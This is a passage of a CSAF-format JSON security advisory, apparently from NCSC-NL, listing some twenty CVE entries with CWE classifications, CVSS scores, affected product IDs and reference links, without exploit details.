"CSAFPID-21"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-27500 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2023/cve-2023-27500.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.6,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
}
],
"title": "CVE-2023-27500"
},
{
"cve": "CVE-2024-13009",
"cwe": {
"id": "CWE-404",
"name": "Improper Resource Shutdown or Release"
},
"notes": [
{
"category": "other",
"text": "Improper Resource Shutdown or Release",
"title": "CWE-404"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-13009 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2024/cve-2024-13009.json"
}
],
"title": "CVE-2024-13009"
},
{
"cve": "CVE-2025-22228",
"cwe": {
"id": "CWE-521",
"name": "Weak Password Requirements"
},
"notes": [
{
"category": "other",
"text": "Weak Password Requirements",
"title": "CWE-521"
},
{
"category": "other",
"text": "Improper Authentication",
"title": "CWE-287"
},
{
"category": "other",
"text": "Incorrect Authorization",
"title": "CWE-863"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-22228 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-22228.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.4,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
}
],
"title": "CVE-2025-22228"
},
{
"cve": "CVE-2025-27428",
"cwe": {
"id": "CWE-862",
"name": "Missing Authorization"
},
"notes": [
{
"category": "other",
"text": "Missing Authorization",
"title": "CWE-862"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-27428 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-27428.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
}
],
"title": "CVE-2025-27428"
},
{
"cve": "CVE-2025-42911",
"cwe": {
"id": "CWE-862",
"name": "Missing Authorization"
},
"notes": [
{
"category": "other",
"text": "Missing Authorization",
"title": "CWE-862"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-42911 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-42911.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
}
],
"title": "CVE-2025-42911"
},
{
"cve": "CVE-2025-42912",
"cwe": {
"id": "CWE-862",
"name": "Missing Authorization"
},
"notes": [
{
"category": "other",
"text": "Missing Authorization",
"title": "CWE-862"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-42912 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-42912.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
}
],
"title": "CVE-2025-42912"
},
{
"cve": "CVE-2025-42913",
"cwe": {
"id": "CWE-862",
"name": "Missing Authorization"
},
"notes": [
{
"category": "other",
"text": "Missing Authorization",
"title": "CWE-862"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-42913 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-42913.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.1,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
}
],
"title": "CVE-2025-42913"
},
{
"cve": "CVE-2025-42914",
"cwe": {
"id": "CWE-862",
"name": "Missing Authorization"
},
"notes": [
{
"category": "other",
"text": "Missing Authorization",
"title": "CWE-862"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-42914 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-42914.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.1,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
}
],
"title": "CVE-2025-42914"
},
{
"cve": "CVE-2025-42915",
"cwe": {
"id": "CWE-862",
"name": "Missing Authorization"
},
"notes": [
{
"category": "other",
"text": "Missing Authorization",
"title": "CWE-862"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-42915 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-42915.json"
}
],
"title": "CVE-2025-42915"
},
{
"cve": "CVE-2025-42916",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"notes": [
{
"category": "other",
"text": "Improper Validation of Specified Type of Input",
"title": "CWE-1287"
},
{
"category": "general",
"text": "CVSS:4.0/AV:A/AC:L/AT:N/PR:H/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-42916 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-42916.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
}
],
"title": "CVE-2025-42916"
},
{
"cve": "CVE-2025-42917",
"cwe": {
"id": "CWE-862",
"name": "Missing Authorization"
},
"notes": [
{
"category": "other",
"text": "Missing Authorization",
"title": "CWE-862"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-42917 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-42917.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
}
],
"title": "CVE-2025-42917"
},
{
"cve": "CVE-2025-42918",
"cwe": {
"id": "CWE-862",
"name": "Missing Authorization"
},
"notes": [
{
"category": "other",
"text": "Missing Authorization",
"title": "CWE-862"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-42918 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-42918.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
}
],
"title": "CVE-2025-42918"
},
{
"cve": "CVE-2025-42920",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"notes": [
{
"category": "other",
"text": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"title": "CWE-79"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-42920 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-42920.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
}
],
"title": "CVE-2025-42920"
},
{
"cve": "CVE-2025-42922",
"cwe": {
"id": "CWE-94",
"name": "Improper Control of Generation of Code (\u0027Code Injection\u0027)"
},
"notes": [
{
"category": "other",
"text": "Improper Control of Generation of Code (\u0027Code Injection\u0027)",
"title": "CWE-94"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-42922 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-42922.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.9,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
}
],
"title": "CVE-2025-42922"
},
{
"cve": "CVE-2025-42923",
"cwe": {
"id": "CWE-352",
"name": "Cross-Site Request Forgery (CSRF)"
},
"notes": [
{
"category": "other",
"text": "Cross-Site Request Forgery (CSRF)",
"title": "CWE-352"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-42923 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-42923.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
}
],
"title": "CVE-2025-42923"
},
{
"cve": "CVE-2025-42925",
"cwe": {
"id": "CWE-341",
"name": "Predictable from Observable State"
},
"notes": [
{
"category": "other",
"text": "Predictable from Observable State",
"title": "CWE-341"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-42925 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-42925.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
}
],
"title": "CVE-2025-42925"
},
{
"cve": "CVE-2025-42926",
"cwe": {
"id": "CWE-306",
"name": "Missing Authentication for Critical Function"
},
"notes": [
{
"category": "other",
"text": "Missing Authentication for Critical Function",
"title": "CWE-306"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-42926 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-42926.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
}
],
"title": "CVE-2025-42926"
},
{
"cve": "CVE-2025-42927",
"cwe": {
"id": "CWE-1395",
"name": "Dependency on Vulnerable Third-Party Component"
},
"notes": [
{
"category": "other",
"text": "Dependency on Vulnerable Third-Party Component",
"title": "CWE-1395"
},
{
"category": "general",
"text": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-42927 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-42927.json"
}
],
"title": "CVE-2025-42927"
},
{
"cve": "CVE-2025-42929",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"notes": [
{
"category": "other",
"text": "Improper Validation of Specified Type of Input",
"title": "CWE-1287"
},
{
"category": "general",
"text": "CVSS:4.0/AV:A/AC:L/AT:N/PR:H/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
